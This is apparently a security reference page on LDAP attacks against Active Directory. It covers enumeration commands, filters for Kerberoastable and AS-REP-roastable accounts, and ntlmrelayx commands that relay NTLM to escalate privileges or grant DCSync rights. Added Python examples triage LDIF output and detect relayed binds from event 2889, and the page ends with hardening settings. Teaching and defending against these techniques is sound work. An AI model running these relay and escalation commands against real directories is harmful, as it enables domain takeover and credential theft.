High Severity | T1078
📂 LDAP Attack Techniques
🧠 Description
LDAP (Lightweight Directory Access Protocol) is the protocol clients use to query and modify Active Directory; every domain controller exposes it on TCP 389 (LDAP) and 636 (LDAPS). Attacks against it fall into three groups: enumerating users, groups and account flags to pick targets for credential attacks (Kerberoasting, AS-REP roasting, password spraying); abusing weak binds (anonymous reads, simple binds over cleartext); and relaying captured NTLM authentication to the directory to modify objects when LDAP signing and channel binding are not enforced.
🔍 LDAP Enumeration
```bash
# Authenticated enumeration with ldapsearch. OpenLDAP 2.5+ removed -h/-p; pass a URI with -H.
# AD accepts the user's DN, a UPN (user@domain.com) or DOMAIN\user as the simple-bind identity.
ldapsearch -x -H ldap://target.com -D "user@domain.com" -w password -b "DC=domain,DC=com"

# Anonymous bind: the rootDSE is readable without credentials and lists the naming contexts and
# supported SASL mechanisms. namingContexts lives only on the rootDSE, so query it with an
# empty base and base scope; anything below it normally requires an authenticated bind.
ldapsearch -x -H ldap://target.com -s base -b "" "(objectClass=*)" \
  namingContexts defaultNamingContext supportedSASLMechanisms

# enum4linux for SMB/RPC-based AD enumeration (users, groups, shares, password policy)
enum4linux -a target.com

# windapsearch (ropnop, Python version): -U users, -G groups, --da Domain Admins
python3 windapsearch.py -d domain.com --dc-ip target.com -u 'domain\user' -p password -U
python3 windapsearch.py -d domain.com --dc-ip target.com -u 'domain\user' -p password -G
python3 windapsearch.py -d domain.com --dc-ip target.com -u 'domain\user' -p password --da
```
💣 LDAP Queries
```bash
# Users with an SPN (Kerberoastable). Restrict to person objects: every computer account has
# SPNs, and krbtgt is never a useful target. AD does not answer these queries anonymously.
ldapsearch -x -H ldap://target.com -D "user@domain.com" -w pass -b "DC=domain,DC=com" \
  "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))" \
  sAMAccountName servicePrincipalName | grep -E '^(dn|sAMAccountName|servicePrincipalName):'

# Admin accounts. memberOf alone matches only direct membership; the LDAP_MATCHING_RULE_IN_CHAIN
# OID 1.2.840.113556.1.4.1941 walks nested groups. The built-in Administrators group lives in
# CN=Builtin, not CN=Users; Domain Admins lives in CN=Users.
ldapsearch -x -H ldap://target.com -D "user@domain.com" -w pass -b "DC=domain,DC=com" \
  "(&(objectClass=user)(memberOf:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=domain,DC=com))" \
  sAMAccountName
ldapsearch -x -H ldap://target.com -D "user@domain.com" -w pass -b "DC=domain,DC=com" \
  "(&(objectClass=user)(memberOf:1.2.840.113556.1.4.1941:=CN=Administrators,CN=Builtin,DC=domain,DC=com))" \
  sAMAccountName

# Accounts with "Do not require Kerberos preauthentication" (AS-REP roastable).
# 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND; 4194304 = 0x400000 = DONT_REQ_PREAUTH.
ldapsearch -x -H ldap://target.com -D "user@domain.com" -w pass -b "DC=domain,DC=com" \
  "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
```
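The ldapsearch commands in the two sections above dump raw LDIF; deciding which accounts are actually roastable still means decoding userAccountControl bits and discarding computers, krbtgt and disabled accounts. The following is an added example (not code from the original page) that parses ldapsearch-style LDIF, applies those checks, and builds the nested-membership filter with RFC 4515 escaping so a group name taken from user input cannot alter the filter. The LDIF embedded in it is constructed for the example; the account names, SPNs and the base64 description are illustrative.

```python
"""Triage ldapsearch LDIF output for roastable accounts and build safe LDAP filters.
Added example; the LDIF below is constructed, not captured from a real directory."""
import base64
from typing import Dict, List

# userAccountControl bits (MS-SAMR)
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000  # 4194304, the value used in the 1.2.840.113556.1.4.803 filter

# Constructed output in the shape ldapsearch prints for "(objectClass=user)" with the
# attribute list sAMAccountName servicePrincipalName userAccountControl objectCategory description
SAMPLE_LDIF = """\
# extended LDIF
# base <DC=domain,DC=com> with scope subtree

dn: CN=svc_sql,CN=Users,DC=domain,DC=com
sAMAccountName: svc_sql
servicePrincipalName: MSSQLSvc/sql01.domain.com:1433
servicePrincipalName: MSSQLSvc/sql01.domain.com
userAccountControl: 66048
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=domain,DC=com
description:: UGFzc3dvcmQ6IFN1bW1lcjIwMjQh

dn: CN=jdoe,CN=Users,DC=domain,DC=com
sAMAccountName: jdoe
userAccountControl: 4260352
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=domain,DC=com

dn: CN=krbtgt,CN=Users,DC=domain,DC=com
sAMAccountName: krbtgt
servicePrincipalName: kadmin/changepw
userAccountControl: 514
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=domain,DC=com

dn: CN=SQL01,CN=Computers,DC=domain,DC=com
sAMAccountName: SQL01$
servicePrincipalName: HOST/sql01.domain.com
userAccountControl: 4096
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=domain,DC=com

dn: CN=old_svc,CN=Users,DC=domain,DC=com
sAMAccountName: old_svc
servicePrincipalName: HTTP/old.domain.com
userAccountControl: 66050
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=domain,DC=com

search: 2
result: 0 Success
"""


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Parse LDIF as ldapsearch prints it: '#' comments, blank-line-separated entries,
    'attr:: value' for base64 values, and a leading space continuing the previous line."""
    unfolded: List[str] = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]          # RFC 2849 line folding
        else:
            unfolded.append(line)
    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    for line in unfolded + [""]:
        if line.startswith("#"):
            continue
        if not line.strip():
            if "dn" in current:               # drops the trailing search:/result: block
                entries.append(current)
            current = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):             # base64-encoded value
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr, []).append(value)
    return entries


def uac_has(entry: Dict[str, List[str]], bit: int) -> bool:
    return (int(entry.get("userAccountControl", ["0"])[0]) & bit) != 0


def is_person(entry: Dict[str, List[str]]) -> bool:
    return entry.get("objectCategory", [""])[0].lower().startswith("cn=person,")


def kerberoastable(entries: List[Dict[str, List[str]]]) -> List[str]:
    """Enabled person accounts with an SPN, minus krbtgt: the same population as the
    (&(objectCategory=person)(servicePrincipalName=*)...) filter, plus the enabled check,
    since the KDC issues no service ticket for a disabled account."""
    return sorted(e["sAMAccountName"][0] for e in entries
                  if is_person(e) and e.get("servicePrincipalName")
                  and e["sAMAccountName"][0].lower() != "krbtgt"
                  and not uac_has(e, ACCOUNTDISABLE))


def asrep_roastable(entries: List[Dict[str, List[str]]]) -> List[str]:
    """Enabled person accounts with DONT_REQ_PREAUTH set."""
    return sorted(e["sAMAccountName"][0] for e in entries
                  if is_person(e) and uac_has(e, DONT_REQ_PREAUTH)
                  and not uac_has(e, ACCOUNTDISABLE))


def descriptions(entries: List[Dict[str, List[str]]]) -> Dict[str, str]:
    """description is a classic place for leaked passwords; collect it for review."""
    return {e["sAMAccountName"][0]: e["description"][0] for e in entries if "description" in e}


def ldap_escape(value: str) -> str:
    """RFC 4515 escaping for a value placed inside a filter (prevents filter injection)."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)


def nested_member_filter(group_dn: str) -> str:
    """Filter for all (transitive) user members of group_dn via LDAP_MATCHING_RULE_IN_CHAIN."""
    return "(&(objectClass=user)(memberOf:1.2.840.113556.1.4.1941:=%s))" % ldap_escape(group_dn)


if __name__ == "__main__":
    found = parse_ldif(SAMPLE_LDIF)
    print("Kerberoastable:", kerberoastable(found))
    print("AS-REP roastable:", asrep_roastable(found))
    print("Descriptions:", descriptions(found))
    print(nested_member_filter("CN=Domain Admins,CN=Users,DC=domain,DC=com"))
```

Feed it real output with `ldapsearch ... > dump.ldif` and `parse_ldif(open("dump.ldif").read())`; the computer account and the disabled SPN holder in the sample show why the raw `(servicePrincipalName=*)` filter overstates the Kerberoastable set.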
🔄 LDAP Relay
```bash
# Relay captured NTLM authentication to LDAP on a DC (ntlmrelayx from Impacket)
python3 ntlmrelayx.py -t ldap://dc01.domain.com -smb2support

# The DC default is LDAP signing "negotiated" (not required) and no channel binding. NTLM that
# arrives over HTTP (e.g. coerced WebDAV, WPAD) does not negotiate signing and relays to LDAP
# cleanly. NTLM that arrives over SMB negotiates signing, so the DC drops the relayed session
# unless the MIC is stripped and the signing flags cleared:
#   CVE-2019-1040 ("Drop the MIC"), unpatched targets only
python3 ntlmrelayx.py -t ldap://dc01.domain.com -smb2support --remove-mic

# LDAPS is protected by channel binding, not signing; relay to it works until
# LdapEnforceChannelBinding is set to Always. --delegate-access configures RBCD
# on the relayed computer account.
python3 ntlmrelayx.py -t ldaps://dc01.domain.com -smb2support --delegate-access

# Escalate a controlled user: adds it to Enterprise Admins when the relayed account can, otherwise
# grants it replication (DCSync) rights through a DACL change on the domain object
python3 ntlmrelayx.py -t ldap://target.com -smb2support --escalate-user attacker

# CVE-2020-1472 (Zerologon) is not a relay technique: it is a Netlogon flaw that resets the DC
# machine account password and gives DC access directly, independent of LDAP signing.
```
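The relay paths above only work while the DC accepts unsigned LDAP binds, and a DC records every such bind as Directory Service event 2889 (client IP, the identity presented, and whether it was an unsigned SASL bind or a cleartext simple bind). Triaging those events is how a defender finds what would break before setting LDAPServerIntegrity to Require, and it is also where a relay shows up: the victim's identity arriving from the relay host's address. The following is an added example (not code from the original page) that parses 2889 event bodies and flags identities binding from hosts they are not expected on. The event texts are constructed in the shape Windows writes them, and the expected-host mapping is hypothetical.

```python
"""Triage Directory Service event 2889 (unsigned or cleartext LDAP binds).
Added example; the events and the expected-host map below are constructed."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

PREAMBLE = ("The following client performed a SASL (Negotiate/Kerberos/NTLM/Digest) LDAP bind "
            "without requesting signing (integrity verification), or performed a simple bind "
            "over a clear text (non-SSL/TLS-encrypted) LDAP connection.")

# Constructed 2889 bodies. Binding Type 0 = SASL bind without signing,
# 1 = simple bind over a cleartext (non-TLS) connection.
SAMPLE_EVENTS = [PREAMBLE + body for body in (
    "\n\nClient IP address:\n10.0.0.25:49812\n"
    "Identity the client attempted to authenticate as:\nDOMAIN\\svc_backup\nBinding Type:\n0",
    "\n\nClient IP address:\n10.0.0.99:51433\n"          # same identity, unexpected source host
    "Identity the client attempted to authenticate as:\nDOMAIN\\svc_backup\nBinding Type:\n0",
    "\n\nClient IP address:\n10.0.0.40:60210\n"
    "Identity the client attempted to authenticate as:\nDOMAIN\\appuser\nBinding Type:\n1",
)]

# Hypothetical allow-list: which hosts each identity is known to bind from
EXPECTED_HOSTS: Dict[str, Set[str]] = {
    "DOMAIN\\svc_backup": {"10.0.0.25"},
    "DOMAIN\\appuser": {"10.0.0.40"},
}

EVENT_2889 = re.compile(
    r"Client IP address:\s*(?P<ip>\[[^\]]+\]|[0-9.]+):(?P<port>\d+)\s*"
    r"Identity the client attempted to authenticate as:\s*(?P<identity>\S+)\s*"
    r"Binding Type:\s*(?P<btype>[01])")


def parse_events(texts: List[str]) -> List[Dict[str, object]]:
    """Extract ip, port, identity and binding type from each 2889 body; skip non-matching text."""
    records: List[Dict[str, object]] = []
    for text in texts:
        m = EVENT_2889.search(text)
        if m:
            records.append({"ip": m["ip"], "port": int(m["port"]),
                            "identity": m["identity"], "binding_type": int(m["btype"])})
    return records


def summarize(records: List[Dict[str, object]]) -> Dict[str, Dict[str, object]]:
    """identity -> sorted source IPs and whether any bind was a cleartext simple bind
    (those leak the password on the wire, not just an NTLM exchange)."""
    acc: Dict[str, Dict[str, object]] = defaultdict(lambda: {"ips": set(), "cleartext_simple_bind": False})
    for r in records:
        acc[r["identity"]]["ips"].add(r["ip"])
        if r["binding_type"] == 1:
            acc[r["identity"]]["cleartext_simple_bind"] = True
    return {k: {"ips": sorted(v["ips"]), "cleartext_simple_bind": v["cleartext_simple_bind"]}
            for k, v in acc.items()}


def unexpected_sources(records: List[Dict[str, object]],
                       expected: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """(identity, ip) pairs where an identity bound unsigned from a host not in its allow-list.
    A relayed NTLM bind looks exactly like this: the victim's identity from the relay host."""
    hits = {(str(r["identity"]), str(r["ip"])) for r in records
            if r["ip"] not in expected.get(str(r["identity"]), set())}
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_events(SAMPLE_EVENTS)
    for ident, info in summarize(recs).items():
        print(ident, info)
    print("Unexpected:", unexpected_sources(recs, EXPECTED_HOSTS))
```

Event 2889 is only written when the "16 LDAP Interface Events" value under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics is at least 2; with the default of 0 a DC logs only the periodic 2887 summary count. Once the unsigned binders are known, LDAPServerIntegrity=2 (require signing) and LdapEnforceChannelBinding=2 (always) under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters close the relay paths in the section above.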